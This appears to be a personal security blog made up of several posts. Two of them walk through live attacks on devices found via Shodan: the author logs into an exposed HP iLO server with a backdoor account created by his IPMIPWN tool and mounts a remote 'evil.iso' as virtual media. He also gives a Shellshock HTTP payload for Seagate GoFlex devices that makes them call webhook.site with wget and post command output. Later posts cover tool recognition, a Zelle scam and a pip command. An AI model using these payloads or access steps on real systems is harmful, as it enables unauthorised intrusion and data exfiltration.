IPMI exposure over the internet, IPMIPWN & post compromise activities.

Another stop along memory lane is my favored thing to boast about, IPMIPWN! :P

I thought I would dive back into Shodan and check out the status of the attack surface after all this time. As expected, still stocked with targets! So this time around I wanted to took a look beyond penetration and look at post compromise activity.

Its been a while since I first made IPMIPWN, so a few things have changed. The servers out there are so old that the ciphers used for ssh are no longer supported a modern desktop ssh clients by default, making my first ssh attempt post IPMIPWN hax0rin was much like the below:

ssh backdoor2@target.com

Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Google said to added -o KexAlgorithms=diffie-hellman-group14-sha1, Then: 

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 backdoor2@target.com

Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss backdoor2@target.com

Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc backdoor2@target.com

Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1 

And then:

C:\Users\hacker> ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc -m hmac-sha1 backdoor2@target.com

The authenticity of host 'target.com' can't be established.

DSA key fingerprint is SHA256:LkuLO3/0BBf4iCXIeOO/d9kjh987trtA30pZZkS/ruc.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'target.com' (DSA) to the list of known hosts.

backdoor2@target.com's password:

User:backdoor2 logged-in to ILOBRC444.(target.com)

iLO 3 Standard 1.26 at  Aug 26 2011

Server Name: SER_EPAPAR

Server Power: On

</>hpiLO->

 

Ok, so IPMIPWN got us this far, what next? A few possible attack paths might involve virtual media (VM) functionality. Here is how that might be setup:

First, See what VM is loaded if any

 </>hpiLO-> show map1/oemhp_vm1/cddr1

 Set our own VM

</>hpiLO-> cd map1/oemhp_vm1/cddr1

</map1/oemhp_vm1/cddr1>hpiLO-> set oemhp_image=http://cracker/evil.iso

Enable our "attacker controlled" VM

 </>hpiLO-> set /map1/oemhp_vm1/cddr1 oemhp_boot=connect

Confirm our changes

 </map1/oemhp_vm1/cddr1>hpiLO-> show

I used webhook.site to confirm this attack with great successes, as soon as you set oemhp_boot to connect, you should start seeing connection requests. You could also make your own Kali ISO that has a script to connect to a server somewhere, run on boot or network connection confirmation. More attack paths later >:)

Enjoy the 1's and 0's.. 

Happy New Year!!

 

so imma lilate, sue me :P

Getting a remote shell on Seagate GoFlex devices is still a thing almost ten years later!

Since I have been on a stroll down memory lane, I thought it would be fun to also revisit some of the bigger issues I have reported on in the past, like Getting a remote shell on any one of 68,000+ Seagate GoFlex devices. I found these devices are still plentiful on Shodan and despite all the time that has past. That's not all as they now easier to verify thanks to web services like webhook.site. In the past verifying you had RCE with these devices and the Shellshock bug in general could be tricky, but having something available to the public that catches callbacks makes it so much simpler. 

Here is what the new payload looks like using webhook.site:

GET /support/ HTTP/1.1

Host: vuln.device.ip.here

User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;

 PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget

 http://webhook.site/866285eb-9c4f-4269-997c-6c4d3a960139/a -O /tmp/junk2>&1;

Here is what it looks like when it hits webhook:

If your testing this out your self and using webhook to verify execution, and you see something like the above on your webhook session, w00t! You have just successfully verified its vulnerable to shellshock, it has wget installed and its allowed to make calls outside of its network!

Going a bit further you can also exploit this Shellshock webhook.site combo to exfiltrate some information from our target by adding the --post-data flag to our wget payload with a bash command surrounded by backticks, like this:

--post-data `id`

wget will send the output of the command as post data to webhook :)  

It blows my mind we can still find these on the internets, and even more so that after 9 years no one is patching anything. If you have devices in your network, please for the love of all that is good, update your firmware! 

That's it for now, enjoy the 1's and 0's

Arctic Code Vault Contributor: ✓

Since I am on an ego trip, I thought I would gloate some more by reminding all of a tool a developed with a friend of mine called Upnp-Exploiter back when I still ran DC414 that made it into the Github Arctic Code Vault! So even after the zombie apocalypse, you can use my tool :) If you don't know what the Vault project is you can read more about it Here. I am deeply honored by this and many thanks to Github for including our project! 

That's not all for this project however, another friend of mine caught a glimpse of it being used in a pentest by a company called TraceSecurity! Below is a screen capture of it in the pentest report :) Nothing makes me more prouder than my tools being used by fellow ethical hackers. I hope they got some findings with it on another host! 

That's all for now. Enjoy the 1's and 0's.

Hack3r Achievement Obtained!

You may have seen on my X feed by now, but if not. I am proud to say my IPMIPWN tool was added to not only Kali Linux, but to BlackArch Linux as well!! This happened earlier, but I haven't bragged on the blog yet :) It's so amazing it was so well liked and used! I hope it has helped many hackers in their education and professional careers. 

If you somehow don't know about these projects, welcome skiddy and go here and here and RTFM :P 

I loving giving back to the scene that has helped me so much and I am always trying to do more. Now I can say I honestly have in a "I hope" meaningful way! Thanks to whoever found my tool worthy and all the people at the Kali and BackArch organizations. You are all awesome! Thank you!!

Enjoy the 1's and 0's :)

Go Tell That Spammer, The Scammer, The Crypto Jacker. Tell'em That God's Gonna Cut'em Down.

I HATE spammers, scammers, and just anything evil that tries to capitalize on the regular user, and for the most part I haven't really had any run ins with them, but them bastards are getting crafty and crossed paths with me so I thought I would share the tactics I observed and some of their junk. 

I will start with a Facebook/Zelle scan that was tried against my wife. So Cmoney was posting stuff on FB to sell, she was asking around $200 for the item and she got a hit that same night at around 4AM. He wanted to pay and come get it ASAP, but said he wanted to use Zelle to buy it then come get it later that day. as he was at work. We didn't use Zelle so we asked if he could use any other service, which he said no and said he will pass. Well Cmoney wanted to sell this thing so we got a Zelle account to accommodate this guy. We gave him our Zelle info to send money, which he then says he sent the payment, but nothing showed up on our end, then an email came saying this BS:

For your account to be credited fully with the sum of $230.00 USD You are required to send the sum of 

$100.00 USD (FIRST) to the buyer’s Zelle information for your buyer’s safety

We of course were all, yeah f that. Thats when I took a deeper look at the email from "Zelle" and noticed the from address was zellepay.customerservices024975@gmail.com which is obviously not a Zelle email, but you dont see that URL until  you go into header details, just a hover over the form/to area in gmail shows the below:

So the email is so long that google cuts off the TLD and all you see is the zelle portion. Here is a look at the expanded headers view:

So here there are some clues to its fakeness as you can see the gmail domain. However note the red box, GOOGLE SAYS IT'S AN IMPORTANT EMAIL!!! This is crazy and adds to its legitimacy.

Well we figure WTH and played along, but tell him we cant send the 100 bucks first. He then says he will pay it as long as we pay it back. We say sure we will pay it back no problem. We then get an email saying Zelle got it and all is good, he thought we would just send the 100 right away, but nah lol. We told him as soon as he sends the money for the item we will send his money back. We never heard back lol. I guess they don't like going off script. Maybe next time :) 

Enjoy the 1's and 0's.

Getting GSMEvil2 working on Debian.

So MOST of the instructions on GSMEvil2's github work fine with the exception of the pip guidance. Here is what I had to use to get it working:

pip3 install pyshark flask flask_socketio==4.3.2 pysqlite3

Yeah its a short post,  Deal with it :P